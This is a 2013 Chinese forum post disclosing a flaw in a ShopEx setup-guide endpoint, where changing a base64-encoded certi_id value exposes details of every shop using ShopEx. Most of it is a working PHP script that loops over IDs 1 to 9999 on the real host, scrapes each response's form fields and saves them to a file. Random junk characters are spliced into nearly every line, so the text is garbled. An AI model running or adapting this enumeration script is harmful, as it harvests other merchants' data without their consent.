|
|
简要描述:6 k( }; I9 X# N9 v
ShopEx某接口缺陷,可遍历所有网站$ e: O) |3 H N' t
详细说明:
5 }: s* t7 ^4 K7 \; X& }问题出现在shopex 网店使用向导页面 # H. |) n" ?1 z7 o
% Z& w' j6 Q1 Q1 V; q
0 i) `" c+ Q C' n3 d2 ]$ m: P3 W$ p6 S- ~
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=, ]+ N5 R" e' p' x! l# v9 X. ]
9 f; S3 g2 M2 R* U0 P
Q) ]0 X9 Q/ D) E1 y) O4 o- ]) Z! p) `$ P
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
' L/ G: ~; |: m% v) C4 m, L j3 }' l4 A; ~6 Q Y9 w
; x x6 d+ h- z/ V2 d
6 T1 z+ [7 q" c/ N
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 8 u$ F, g* `! R! [1 i2 {
3 [/ h+ \7 I' a# c/ M9 W3 \5 K/ Y
& | H6 E' P! m% ^8 A8 F
6 s9 n# [! J+ a9 g$ l& w/ P<?php' |0 I: a+ l: J& p: ]
' R5 A/ `+ D- Q x$ `# B$ s for ($i=1; $i < 10000; $i++) { //遍历9 i/ m: [/ d, S8 G3 B- }
! I3 y% Z, k* t5 L& T+ U
ShowshopExD($i);
i0 [" s6 W2 }7 I4 }- \1 {. e$ p" L# y- K4 t0 X+ S
}
9 H% e. u/ o! Y, b
6 f% H/ S+ P4 C! Y6 M6 w function ShowshopExD($cid) {0 S x8 P ?- P; ]8 F7 J) w
( m2 I9 p i4 d* W8 y- v
$url='http://guide.ecos.shopex.cn/step2.php';
) W! v& H2 E9 g$ \1 n8 E& o& x+ a& Z3 f) D9 d3 |3 i
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');: ^2 K: F. d0 b) o5 e" H$ Y+ K
% c" D S9 ~" X& C4 w1 z E
$url = $url.'?refer='.$refer;. @; a6 R/ _% o, v* `5 b
( l3 T/ H2 X9 n! Q( r $ch = curl_init($url);& y0 m6 B3 a9 D
5 X: K D6 \$ z$ r5 U+ Q* M6 m
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
2 ~, t- ?1 ?4 n# I8 e6 T2 o2 B# A7 i1 [+ H
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
7 }3 Z; A( R6 Z& S* V/ G: r
L4 H# k* v* [$ L) z8 T $result = curl_exec($ch);% d( k! y) B9 Y, T1 c
3 z5 L4 o+ O. n! w# n! i
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
2 I& s( k& g0 M, O) J; N* F+ o/ I* w$ ^% d" m: E( m8 N! i; Y' v
if(strpos($result,$refer))' ^/ O9 }$ A$ K2 u K
. F0 k6 Q& S) G: u& p5 y
{" P; A, E5 u8 Q' z! V' t" h ]3 R
0 D1 d! x9 q; _' G- P" u/ S. n $fp = fopen("c:/shopEx.txt",'ab'); //保存文件: ]: G: h, ~0 A$ N e
2 Z# J1 S2 i+ y7 X5 r
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);9 n+ q8 R( E I" o
; F L A1 \0 \1 t7 K7 Y
foreach ($value[1] as $key) {0 j! O4 \& h# u
5 o0 l& A" t, v! a- h$ L preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
. |( W* y9 ]& j# g z8 u3 L4 E# u+ Z5 t! n. d0 X7 w
echo $res[1][0].':'.$res[3][0]."\r\n";" v2 P& u0 e+ O) K8 E6 i3 P. H5 m
) O0 A6 u6 z, T, _7 T5 @, J
$col =$res[1][0].':'.$res[3][0]."\r\n"; . a: A$ G) C% g: Q" ?2 K8 ~ N
3 ?' p, e1 C; C4 z7 x# A
fwrite($fp, $col, strlen($col)); 3 [( B; p0 P r( g6 |
# C0 Y; s9 V1 g3 \' M, z+ p7 g: o }$ o; [2 Q' Z: ^9 e
! p& u' O% D. H8 F! I& S* u
echo '--------------------------------'."\r\n";
' W. X' d0 w# T5 E- Y) p2 N( u" T3 @! O2 [
fclose($fp);
2 K3 y! W$ |" n* d' x
& O/ [4 Z+ Q* g }
2 c4 L& g+ r2 A- i8 u1 \6 {: X
flush();+ ^+ j' @( P/ o5 B
( j5 R7 H' T% e* t
curl_close($ch);, D/ k4 _0 e, B: K
2 |2 L7 s2 V5 \8 `: d6 c! f, n8 ^
}* A% r, W' X A
$ |1 c. ]+ j9 [. m2 M* k
?>: o2 G9 W2 ^% ^2 |$ Q3 `3 X9 O) }) L$ Y
漏洞证明:
& I/ q( ~( M6 `http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
# c, a3 m" h4 p( y$ ]% Hrefer换成其他加密方式
p9 y0 C I3 F |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对